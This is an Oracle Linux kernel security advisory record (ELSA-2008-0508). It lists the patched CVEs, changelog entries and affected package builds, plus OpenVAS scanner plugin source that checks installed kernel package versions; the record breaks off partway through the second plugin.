ID ELSA-2008-0508
Type oraclelinux
Reporter Oracle
Modified 2008-06-26T00:00:00
Description
[2.6.9-67.0.20.0.1.EL]
- fix skb alignment that was causing sendto() to fail with EFAULT (Olaf Kirch) [orabug 6845794]
- fix entropy flag in bnx2 driver to generate entropy pool (John Sobecki) [orabug 5931647]
- fix enomem due to larger mtu size page alloc (Zach Brown) [orabug 5486128]
- fix per_cpu() api bug_on with rds (Zach Brown) [orabug 5760648]
- remove patch sysrq-b that queues upto keventd thread [orabug 6125546]
- allow more than 4GB hugepage for single user (Herbert van den Bergh) [orabug 6002738]
- netrx/netpoll race avoidance (Tina Yang) [orabug 6143381]
- fix pv guest oops on live migration (Chuck Anderson) [orabugz 4118]
[2.6.9-67.0.20]
-x8664: copy_user doesn't zero tail bytes on page fault (Vitaly Mayatskikh) [451273 451274]
[2.6.9-67.0.19]
-[revert] Add HP DL580 G5 to bfsort whitelist (Tony Camuso) [437976 429727]
[2.6.9-67.0.18]
-sys_times: Fix system unresponsiveness during many concurrent invocation of sys_times (Vitaly Mayatskikh) [449101 435280]
-Add HP DL580 G5 to bfsort whitelist (Tony Camuso) [437976 429727]
-ptrace: fix ptrace_attach and ptrace_detach race (Jerome Marchand) [449361 311931]
-[revert] neofb: avoid overwriting fb_info fields (Vitaly Mayatskikh) [430251]
-[revert] buffer overflow in moxa driver (Vitaly Mayatskikh) [423131] {CVE-2005-0504}
[2.6.9-67.0.17]
-x8664: copy_user leaks uninitialized data on page fault (Vitaly Mayatskikh) [433942 433943] {CVE-2008-0598}
-fix possible buffer overflow in ASN.1 parsing routine (Anton Arapov ) [444462 444463] {CVE-2008-1673}
[2.6.9-67.0.16]
-Kernel does not clear direction flag for signal handlers (Vitaly Mayatskikh) [437314 437315] {CVE-2008-1367}
{"id": "ELSA-2008-0508", "bulletinFamily": "unix", "title": "kernel security and bug fix update", "description": "[2.6.9-67.0.20.0.1.EL]\n- fix skb alignment that was causing sendto() to fail with EFAULT (Olaf Kirch) [orabug 6845794]\n- fix entropy flag in bnx2 driver to generate entropy pool (John Sobecki) [orabug 5931647]\n- fix enomem due to larger mtu size page alloc (Zach Brown) [orabug 5486128]\n- fix per_cpu() api bug_on with rds (Zach Brown) [orabug 5760648]\n- remove patch sysrq-b that queues upto keventd thread [orabug 6125546]\n- allow more than 4GB hugepage for single user (Herbert van den Bergh) [orabug 6002738]\n- netrx/netpoll race avoidance (Tina Yang) [orabug 6143381]\n- fix pv guest oops on live migration (Chuck Anderson) [orabugz 4118]\n[2.6.9-67.0.20]\n-x8664: copy_user doesn't zero tail bytes on page fault (Vitaly Mayatskikh) [451273 451274]\n[2.6.9-67.0.19]\n-[revert] Add HP DL580 G5 to bfsort whitelist (Tony Camuso) [437976 429727]\n[2.6.9-67.0.18]\n-sys_times: Fix system unresponsiveness during many concurrent invocation of sys_times (Vitaly Mayatskikh) [449101 435280]\n-Add HP DL580 G5 to bfsort whitelist (Tony Camuso) [437976 429727]\n-ptrace: fix ptrace_attach and ptrace_detach race (Jerome Marchand) [449361 311931]\n-[revert] neofb: avoid overwriting fb_info fields (Vitaly Mayatskikh) [430251]\n-[revert] buffer overflow in moxa driver (Vitaly Mayatskikh) [423131] {CVE-2005-0504}\n[2.6.9-67.0.17]\n-x8664: copy_user leaks uninitialized data on page fault (Vitaly Mayatskikh) [433942 433943] {CVE-2008-0598}\n-fix possible buffer overflow in ASN.1 parsing routine (Anton Arapov ) [444462 444463] {CVE-2008-1673}\n[2.6.9-67.0.16]\n-Kernel does not clear direction flag for signal handlers (Vitaly Mayatskikh) [437314 437315] {CVE-2008-1367}", "published": "2008-06-26T00:00:00", "modified": "2008-06-26T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "http://linux.oracle.com/errata/ELSA-2008-0508.html", "reporter": "Oracle", "references": [], "cvelist": ["CVE-2008-0598", "CVE-2005-0504", "CVE-2008-2365", "CVE-2008-2729", "CVE-2008-1367", "CVE-2008-1673"], "type": "oraclelinux", "lastseen": "2019-05-29T18:34:58", "edition": 4, "viewCount": 8, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-1367", "CVE-2008-1673", "CVE-2008-0598", "CVE-2005-0504", "CVE-2008-2365", "CVE-2008-2729"]}, {"type": "nessus", "idList": ["ORACLELINUX_ELSA-2008-0508.NASL", "CENTOS_RHSA-2008-0508.NASL", "ORACLELINUX_ELSA-2008-0519.NASL", "REDHAT-RHSA-2008-0519.NASL", "SUSE_KERNEL-5605.NASL", "SL_20080625_KERNEL_ON_SL5_X.NASL", "REDHAT-RHSA-2008-0508.NASL", "SUSE_KERNEL-5565.NASL", "CENTOS_RHSA-2008-0519.NASL", "SL_20080625_KERNEL_ON_SL4_X.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310870138", "OPENVAS:1361412562310870042", "OPENVAS:1361412562310122573", "OPENVAS:1361412562310880043", "OPENVAS:880043", "OPENVAS:870042", "OPENVAS:1361412562310880015", "OPENVAS:880015", "OPENVAS:850019", "OPENVAS:870138"]}, {"type": "redhat", "idList": ["RHSA-2005:529", "RHSA-2008:0237", "RHSA-2008:0519", "RHSA-2005:551", "RHSA-2008:0508"]}, {"type": "centos", "idList": ["CESA-2008:0237", "CESA-2008:0519", "CESA-2005:529-01", "CESA-2008:0508"]}, {"type": "oraclelinux", "idList": ["ELSA-2008-0665", "ELSA-2008-0519", "ELSA-2009-0225", "ELSA-2008-0973"]}, {"type": "suse", "idList": ["SUSE-SA:2008:048", "SUSE-SA:2008:044", "SUSE-SA:2008:031", "SUSE-SA:2008:038", "SUSE-SA:2008:047", "SUSE-SA:2008:049", "SUSE-SA:2008:035"]}, {"type": "ubuntu", "idList": ["USN-625-1", "USN-637-1"]}, {"type": "seebug", "idList": ["SSV:3496", "SSV:3495", "SSV:3494", "SSV:3393", "SSV:3896"]}, {"type": "osvdb", "idList": ["OSVDB:12837"]}, {"type": "exploitdb", "idList": ["EDB-ID:31965", "EDB-ID:31966"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:20387", "SECURITYVULNS:DOC:19991", "SECURITYVULNS:VULN:9065", "SECURITYVULNS:VULN:9235"]}, {"type": "debian", "idList": ["DEBIAN:DSA-1592-2:CB6D2", "DEBIAN:DSA-1592-1:BE103", "DEBIAN:DSA-1630-1:8E4BC"]}], "modified": "2019-05-29T18:34:58", "rev": 2}, "score": {"value": 7.6, "vector": "NONE", "modified": "2019-05-29T18:34:58", "rev": 2}, "vulnersScore": 7.6}, "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "4", "arch": "src", "operator": "lt", "packageFilename": "kernel-2.6.9-67.0.20.0.1.EL.src.rpm", "packageName": "kernel", "packageVersion": "2.6.9-67.0.20.0.1.EL"}, {"OS": "Oracle Linux", "OSVersion": "4", "arch": "src", "operator": "lt", "packageFilename": "kernel-2.6.9-67.0.20.0.1.EL.src.rpm", "packageName": "kernel", "packageVersion": "2.6.9-67.0.20.0.1.EL"}, {"OS": "Oracle Linux", "OSVersion": "4", "arch": "src", "operator": "lt", "packageFilename": "kernel-2.6.9-67.0.20.0.1.EL.src.rpm", "packageName": "kernel", "packageVersion": "2.6.9-67.0.20.0.1.EL"}, {"OS": "Oracle Linux", "OSVersion": "4", "arch": "x86_64", "operator": "lt", "packageFilename": "ocfs2-2.6.9-67.0.20.0.1.ELxenU-1.2.9-1.el4.x86_64.rpm", "packageName": "ocfs2-2.6.9-67.0.20.0.1.ELxenU", "packageVersion": "1.2.9-1.el4"}, {"OS": "Oracle Linux", "OSVersion": "4", "arch": "x86_64", "operator": "lt", "packageFilename": "kernel-largesmp-devel-2.6.9-67.0.20.0.1.EL.x86_64.rpm", "packageName": "kernel-largesmp-devel", "packageVersion": "2.6.9-67.0.20.0.1.EL"}, {"OS": "Oracle Linux", "OSVersion": "4", "arch": "i686", "operator": "lt", "packageFilename": "kernel-2.6.9-67.0.20.0.1.EL.i686.rpm", "packageName": "kernel", "packageVersion": "2.6.9-67.0.20.0.1.EL"}, {"OS": "Oracle Linux", "OSVersion": "4", "arch": "i686", "operator": "lt", "packageFilename": "oracleasm-2.6.9-67.0.20.0.1.ELsmp-2.0.3-2.i686.rpm", "packageName": "oracleasm-2.6.9-67.0.20.0.1.ELsmp", "packageVersion": "2.0.3-2"}, {"OS": "Oracle Linux", "OSVersion": "4", "arch": "ia64", "operator": "lt", "packageFilename": "kernel-2.6.9-67.0.20.0.1.EL.ia64.rpm", "packageName": "kernel", "packageVersion": "2.6.9-67.0.20.0.1.EL"}, {"OS": "Oracle Linux", "OSVersion": "4", "arch": "x86_64", "operator": "lt", "packageFilename": "ocfs2-2.6.9-67.0.20.0.1.ELsmp-1.2.9-1.el4.x86_64.rpm", "packageName": "ocfs2-2.6.9-67.0.20.0.1.ELsmp", "packageVersion": "1.2.9-1.el4"}, {"OS": "Oracle Linux", "OSVersion": "4", "arch": "i686", "operator": "lt", "packageFilename": "kernel-hugemem-devel-2.6.9-67.0.20.0.1.EL.i686.rpm", "packageName": "kernel-hugemem-devel", "packageVersion": "2.6.9-67.0.20.0.1.EL"}, {"OS": "Oracle Linux", "OSVersion": "4", "arch": "x86_64", "operator": "lt", "packageFilename": "ocfs2-2.6.9-67.0.20.0.1.EL-1.2.9-1.el4.x86_64.rpm", "packageName": "ocfs2-2.6.9-67.0.20.0.1.EL", "packageVersion": "1.2.9-1.el4"}, {"OS": "Oracle Linux", "OSVersion": "4", "arch": "ia64", "operator": "lt", "packageFilename": "kernel-largesmp-2.6.9-67.0.20.0.1.EL.ia64.rpm", "packageName": "kernel-largesmp", "packageVersion": "2.6.9-67.0.20.0.1.EL"}, {"OS": "Oracle Linux", "OSVersion": "4", "arch": "i686", "operator": "lt", "packageFilename": "kernel-xenU-2.6.9-67.0.20.0.1.EL.i686.rpm", "packageName": "kernel-xenU", "packageVersion": "2.6.9-67.0.20.0.1.EL"}, {"OS": "Oracle Linux", "OSVersion": "4", "arch": "i686", "operator": "lt", "packageFilename": "kernel-smp-2.6.9-67.0.20.0.1.EL.i686.rpm", "packageName": "kernel-smp", "packageVersion": "2.6.9-67.0.20.0.1.EL"}, {"OS": "Oracle Linux", "OSVersion": "4", "arch": "src", "operator": "lt", "packageFilename": "oracleasm-2.6.9-67.0.20.0.1.EL-2.0.3-2.src.rpm", "packageName": "oracleasm-2.6.9-67.0.20.0.1.EL", "packageVersion": "2.0.3-2"}, {"OS": "Oracle Linux", "OSVersion": "4", "arch": "src", "operator": "lt", "packageFilename": "oracleasm-2.6.9-67.0.20.0.1.EL-2.0.3-2.src.rpm", "packageName": "oracleasm-2.6.9-67.0.20.0.1.EL", "packageVersion": "2.0.3-2"}, {"OS": "Oracle Linux", "OSVersion": "4", "arch": "src", "operator": "lt", "packageFilename": "oracleasm-2.6.9-67.0.20.0.1.EL-2.0.3-2.src.rpm", "packageName": "oracleasm-2.6.9-67.0.20.0.1.EL", "packageVersion": "2.0.3-2"}, {"OS": "Oracle Linux", "OSVersion": "4", "arch": "x86_64", "operator": "lt", "packageFilename": "kernel-largesmp-2.6.9-67.0.20.0.1.EL.x86_64.rpm", "packageName": "kernel-largesmp", "packageVersion": "2.6.9-67.0.20.0.1.EL"}, {"OS": "Oracle Linux", "OSVersion": "4", "arch": "i686", "operator": "lt", "packageFilename": "ocfs2-2.6.9-67.0.20.0.1.ELsmp-1.2.9-1.el4.i686.rpm", "packageName": "ocfs2-2.6.9-67.0.20.0.1.ELsmp", "packageVersion": "1.2.9-1.el4"}, {"OS": "Oracle Linux", "OSVersion": "4", "arch": "x86_64", "operator": "lt", "packageFilename": "oracleasm-2.6.9-67.0.20.0.1.ELsmp-2.0.3-2.x86_64.rpm", "packageName": "oracleasm-2.6.9-67.0.20.0.1.ELsmp", "packageVersion": "2.0.3-2"}, {"OS": "Oracle Linux", "OSVersion": "4", "arch": "i686", "operator": "lt", "packageFilename": "ocfs2-2.6.9-67.0.20.0.1.ELhugemem-1.2.9-1.el4.i686.rpm", "packageName": "ocfs2-2.6.9-67.0.20.0.1.ELhugemem", "packageVersion": "1.2.9-1.el4"}, {"OS": "Oracle Linux", "OSVersion": "4", "arch": "x86_64", "operator": "lt", "packageFilename": "oracleasm-2.6.9-67.0.20.0.1.EL-2.0.3-2.x86_64.rpm", "packageName": "oracleasm-2.6.9-67.0.20.0.1.EL", "packageVersion": "2.0.3-2"}, {"OS": "Oracle Linux", "OSVersion": "4", "arch": "x86_64", "operator": "lt", "packageFilename": "kernel-smp-devel-2.6.9-67.0.20.0.1.EL.x86_64.rpm", "packageName": "kernel-smp-devel", "packageVersion": "2.6.9-67.0.20.0.1.EL"}, {"OS": "Oracle Linux", "OSVersion": "4", "arch": "i686", "operator": "lt", "packageFilename": "kernel-devel-2.6.9-67.0.20.0.1.EL.i686.rpm", "packageName": "kernel-devel", "packageVersion": "2.6.9-67.0.20.0.1.EL"}, {"OS": "Oracle Linux", "OSVersion": "4", "arch": "ia64", "operator": "lt", "packageFilename": "ocfs2-2.6.9-67.0.20.0.1.EL-1.2.9-1.el4.ia64.rpm", "packageName": "ocfs2-2.6.9-67.0.20.0.1.EL", "packageVersion": "1.2.9-1.el4"}, {"OS": "Oracle Linux", "OSVersion": "4", "arch": "x86_64", "operator": "lt", "packageFilename": "kernel-smp-2.6.9-67.0.20.0.1.EL.x86_64.rpm", "packageName": "kernel-smp", "packageVersion": "2.6.9-67.0.20.0.1.EL"}, {"OS": "Oracle Linux", "OSVersion": "4", "arch": "i686", "operator": "lt", "packageFilename": "kernel-hugemem-2.6.9-67.0.20.0.1.EL.i686.rpm", "packageName": "kernel-hugemem", "packageVersion": "2.6.9-67.0.20.0.1.EL"}, {"OS": "Oracle Linux", "OSVersion": "4", "arch": "x86_64", "operator": "lt", "packageFilename": "oracleasm-2.6.9-67.0.20.0.1.ELxenU-2.0.3-2.x86_64.rpm", "packageName": "oracleasm-2.6.9-67.0.20.0.1.ELxenU", "packageVersion": "2.0.3-2"}, {"OS": "Oracle Linux", "OSVersion": "4", "arch": "ia64", "operator": "lt", "packageFilename": "oracleasm-2.6.9-67.0.20.0.1.ELlargesmp-2.0.3-2.ia64.rpm", "packageName": "oracleasm-2.6.9-67.0.20.0.1.ELlargesmp", "packageVersion": "2.0.3-2"}, {"OS": "Oracle Linux", "OSVersion": "4", "arch": "i686", "operator": "lt", "packageFilename": "ocfs2-2.6.9-67.0.20.0.1.ELxenU-1.2.9-1.el4.i686.rpm", "packageName": "ocfs2-2.6.9-67.0.20.0.1.ELxenU", "packageVersion": "1.2.9-1.el4"}, {"OS": "Oracle Linux", "OSVersion": "4", "arch": "ia64", "operator": "lt", "packageFilename": "kernel-largesmp-devel-2.6.9-67.0.20.0.1.EL.ia64.rpm", "packageName": "kernel-largesmp-devel", "packageVersion": "2.6.9-67.0.20.0.1.EL"}, {"OS": "Oracle Linux", "OSVersion": "4", "arch": "x86_64", "operator": "lt", "packageFilename": "kernel-2.6.9-67.0.20.0.1.EL.x86_64.rpm", "packageName": "kernel", "packageVersion": "2.6.9-67.0.20.0.1.EL"}, {"OS": "Oracle Linux", "OSVersion": "4", "arch": "i686", "operator": "lt", "packageFilename": "oracleasm-2.6.9-67.0.20.0.1.ELhugemem-2.0.3-2.i686.rpm", "packageName": "oracleasm-2.6.9-67.0.20.0.1.ELhugemem", "packageVersion": "2.0.3-2"}, {"OS": "Oracle Linux", "OSVersion": "4", "arch": "i686", "operator": "lt", "packageFilename": "oracleasm-2.6.9-67.0.20.0.1.EL-2.0.3-2.i686.rpm", "packageName": "oracleasm-2.6.9-67.0.20.0.1.EL", "packageVersion": "2.0.3-2"}, {"OS": "Oracle Linux", "OSVersion": "4", "arch": "x86_64", "operator": "lt", "packageFilename": "kernel-xenU-devel-2.6.9-67.0.20.0.1.EL.x86_64.rpm", "packageName": "kernel-xenU-devel", "packageVersion": "2.6.9-67.0.20.0.1.EL"}, {"OS": "Oracle Linux", "OSVersion": "4", "arch": "x86_64", "operator": "lt", "packageFilename": "kernel-xenU-2.6.9-67.0.20.0.1.EL.x86_64.rpm", "packageName": "kernel-xenU", "packageVersion": "2.6.9-67.0.20.0.1.EL"}, {"OS": "Oracle Linux", "OSVersion": "4", "arch": "i686", "operator": "lt", "packageFilename": "oracleasm-2.6.9-67.0.20.0.1.ELxenU-2.0.3-2.i686.rpm", "packageName": "oracleasm-2.6.9-67.0.20.0.1.ELxenU", "packageVersion": "2.0.3-2"}, {"OS": "Oracle Linux", "OSVersion": "4", "arch": "ia64", "operator": "lt", "packageFilename": "oracleasm-2.6.9-67.0.20.0.1.EL-2.0.3-2.ia64.rpm", "packageName": "oracleasm-2.6.9-67.0.20.0.1.EL", "packageVersion": "2.0.3-2"}, {"OS": "Oracle Linux", "OSVersion": "4", "arch": "x86_64", "operator": "lt", "packageFilename": "ocfs2-2.6.9-67.0.20.0.1.ELlargesmp-1.2.9-1.el4.x86_64.rpm", "packageName": "ocfs2-2.6.9-67.0.20.0.1.ELlargesmp", "packageVersion": "1.2.9-1.el4"}, {"OS": "Oracle Linux", "OSVersion": "4", "arch": "ia64", "operator": "lt", "packageFilename": "ocfs2-2.6.9-67.0.20.0.1.ELlargesmp-1.2.9-1.el4.ia64.rpm", "packageName": "ocfs2-2.6.9-67.0.20.0.1.ELlargesmp", "packageVersion": "1.2.9-1.el4"}, {"OS": "Oracle Linux", "OSVersion": "4", "arch": "x86_64", "operator": "lt", "packageFilename": "kernel-devel-2.6.9-67.0.20.0.1.EL.x86_64.rpm", "packageName": "kernel-devel", "packageVersion": "2.6.9-67.0.20.0.1.EL"}, {"OS": "Oracle Linux", "OSVersion": "4", "arch": "i686", "operator": "lt", "packageFilename": "kernel-smp-devel-2.6.9-67.0.20.0.1.EL.i686.rpm", "packageName": "kernel-smp-devel", "packageVersion": "2.6.9-67.0.20.0.1.EL"}, {"OS": "Oracle Linux", "OSVersion": "4", "arch": "x86_64", "operator": "lt", "packageFilename": "oracleasm-2.6.9-67.0.20.0.1.ELlargesmp-2.0.3-2.x86_64.rpm", "packageName": "oracleasm-2.6.9-67.0.20.0.1.ELlargesmp", "packageVersion": "2.0.3-2"}, {"OS": "Oracle Linux", "OSVersion": "4", "arch": "i686", "operator": "lt", "packageFilename": "ocfs2-2.6.9-67.0.20.0.1.EL-1.2.9-1.el4.i686.rpm", "packageName": "ocfs2-2.6.9-67.0.20.0.1.EL", "packageVersion": "1.2.9-1.el4"}, {"OS": "Oracle Linux", "OSVersion": "4", "arch": "src", "operator": "lt", "packageFilename": "ocfs2-2.6.9-67.0.20.0.1.EL-1.2.9-1.el4.src.rpm", "packageName": "ocfs2-2.6.9-67.0.20.0.1.EL", "packageVersion": "1.2.9-1.el4"}, {"OS": "Oracle Linux", "OSVersion": "4", "arch": "src", "operator": "lt", "packageFilename": "ocfs2-2.6.9-67.0.20.0.1.EL-1.2.9-1.el4.src.rpm", "packageName": "ocfs2-2.6.9-67.0.20.0.1.EL", "packageVersion": "1.2.9-1.el4"}, {"OS": "Oracle Linux", "OSVersion": "4", "arch": "src", "operator": "lt", "packageFilename": "ocfs2-2.6.9-67.0.20.0.1.EL-1.2.9-1.el4.src.rpm", "packageName": "ocfs2-2.6.9-67.0.20.0.1.EL", "packageVersion": "1.2.9-1.el4"}, {"OS": "Oracle Linux", "OSVersion": "4", "arch": "i686", "operator": "lt", "packageFilename": "kernel-xenU-devel-2.6.9-67.0.20.0.1.EL.i686.rpm", "packageName": "kernel-xenU-devel", "packageVersion": "2.6.9-67.0.20.0.1.EL"}, {"OS": "Oracle Linux", "OSVersion": "4", "arch": "ia64", "operator": "lt", "packageFilename": "kernel-devel-2.6.9-67.0.20.0.1.EL.ia64.rpm", "packageName": "kernel-devel", "packageVersion": "2.6.9-67.0.20.0.1.EL"}, {"OS": "Oracle Linux", "OSVersion": "4", "arch": "noarch", "operator": "lt", "packageFilename": "kernel-doc-2.6.9-67.0.20.0.1.EL.noarch.rpm", "packageName": "kernel-doc", "packageVersion": "2.6.9-67.0.20.0.1.EL"}, {"OS": "Oracle Linux", "OSVersion": "4", "arch": "noarch", "operator": "lt", "packageFilename": "kernel-doc-2.6.9-67.0.20.0.1.EL.noarch.rpm", "packageName": "kernel-doc", "packageVersion": "2.6.9-67.0.20.0.1.EL"}, {"OS": "Oracle Linux", "OSVersion": "4", "arch": "noarch", "operator": "lt", "packageFilename": "kernel-doc-2.6.9-67.0.20.0.1.EL.noarch.rpm", "packageName": "kernel-doc", "packageVersion": "2.6.9-67.0.20.0.1.EL"}], "scheme": null}
{"openvas": [{"lastseen": "2018-04-09T11:41:38", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0598", "CVE-2008-2365", "CVE-2008-2729", "CVE-2008-1367"], "description": "Check for the Version of kernel", "modified": "2018-04-06T00:00:00", "published": "2009-02-27T00:00:00", "id": "OPENVAS:1361412562310880043", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310880043", "type": "openvas", "title": "CentOS Update for kernel CESA-2008:0508 centos4 x86_64", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for kernel CESA-2008:0508 centos4 x86_64\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The kernel packages contain the Linux kernel, the core of any Linux\n operating system.\n\n These updated packages fix the following security issues:\n \n * A security flaw was found in the Linux kernel memory copy routines, when\n running on certain AMD64 systems. If an unsuccessful attempt to copy kernel\n memory from source to destination memory locations occurred, the copy\n routines did not zero the content at the destination memory location. This\n could allow a local unprivileged user to view potentially sensitive data.\n (CVE-2008-2729, Important)\n \n * Alexey Dobriyan discovered a race condition in the Linux kernel\n process-tracing system call, ptrace. A local unprivileged user could\n use this flaw to cause a denial of service (kernel hang).\n (CVE-2008-2365, Important)\n \n * Tavis Ormandy discovered a deficiency in the Linux kernel 32-bit and\n 64-bit emulation. This could allow a local unprivileged user to prepare and\n run a specially crafted binary, which would use this deficiency to leak\n uninitialized and potentially sensitive data. (CVE-2008-0598, Important)\n \n * It was discovered that the Linux kernel handled string operations in the\n opposite way to the GNU Compiler Collection (GCC). This could allow a local\n unprivileged user to cause memory corruption. (CVE-2008-1367, Low)\n \n As well, these updated packages fix the following bug:\n \n * On systems with a large number of CPUs (more than 16), multiple\n applications calling the "times()" system call may have caused a system\n hang.\n \n Red Hat Enterprise Linux 4 users are advised to upgrade to these updated\n packages, which contain backported patches to resolve these issues.\";\n\ntag_affected = \"kernel on CentOS 4\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2008-June/015051.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.880043\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-27 08:40:14 +0100 (Fri, 27 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"CESA\", value: \"2008:0508\");\n script_cve_id(\"CVE-2008-0598\", \"CVE-2008-1367\", \"CVE-2008-2365\", \"CVE-2008-2729\");\n script_name( \"CentOS Update for kernel CESA-2008:0508 centos4 x86_64\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS4\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.9~67.0.20.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.9~67.0.20.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.9~67.0.20.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-largesmp\", rpm:\"kernel-largesmp~2.6.9~67.0.20.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-largesmp-devel\", rpm:\"kernel-largesmp-devel~2.6.9~67.0.20.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-smp\", rpm:\"kernel-smp~2.6.9~67.0.20.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-smp-devel\", rpm:\"kernel-smp-devel~2.6.9~67.0.20.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xenU\", rpm:\"kernel-xenU~2.6.9~67.0.20.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xenU-devel\", rpm:\"kernel-xenU-devel~2.6.9~67.0.20.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-27T10:56:47", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0598", "CVE-2008-2365", "CVE-2008-2729", "CVE-2008-1367"], "description": "Check for the Version of kernel", "modified": "2017-07-12T00:00:00", "published": "2009-03-06T00:00:00", "id": "OPENVAS:870138", "href": "http://plugins.openvas.org/nasl.php?oid=870138", "type": "openvas", "title": "RedHat Update for kernel RHSA-2008:0508-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for kernel RHSA-2008:0508-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The kernel packages contain the Linux kernel, the core of any Linux\n operating system.\n\n These updated packages fix the following security issues:\n \n * A security flaw was found in the Linux kernel memory copy routines, when\n running on certain AMD64 systems. If an unsuccessful attempt to copy kernel\n memory from source to destination memory locations occurred, the copy\n routines did not zero the content at the destination memory location. This\n could allow a local unprivileged user to view potentially sensitive data.\n (CVE-2008-2729, Important)\n \n * Alexey Dobriyan discovered a race condition in the Linux kernel\n process-tracing system call, ptrace. A local unprivileged user could\n use this flaw to cause a denial of service (kernel hang).\n (CVE-2008-2365, Important)\n \n * Tavis Ormandy discovered a deficiency in the Linux kernel 32-bit and\n 64-bit emulation. This could allow a local unprivileged user to prepare and\n run a specially crafted binary, which would use this deficiency to leak\n uninitialized and potentially sensitive data. (CVE-2008-0598, Important)\n \n * It was discovered that the Linux kernel handled string operations in the\n opposite way to the GNU Compiler Collection (GCC). This could allow a local\n unprivileged user to cause memory corruption. (CVE-2008-1367, Low)\n \n As well, these updated packages fix the following bug:\n \n * On systems with a large number of CPUs (more than 16), multiple\n applications calling the "times()" system call may have caused a system\n hang.\n \n Red Hat Enterprise Linux 4 users are advised to upgrade to these updated\n packages, which contain backported patches to resolve these issues.\";\n\ntag_affected = \"kernel on Red Hat Enterprise Linux AS version 4,\n Red Hat Enterprise Linux ES version 4,\n Red Hat Enterprise Linux WS version 4\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2008-June/msg00020.html\");\n 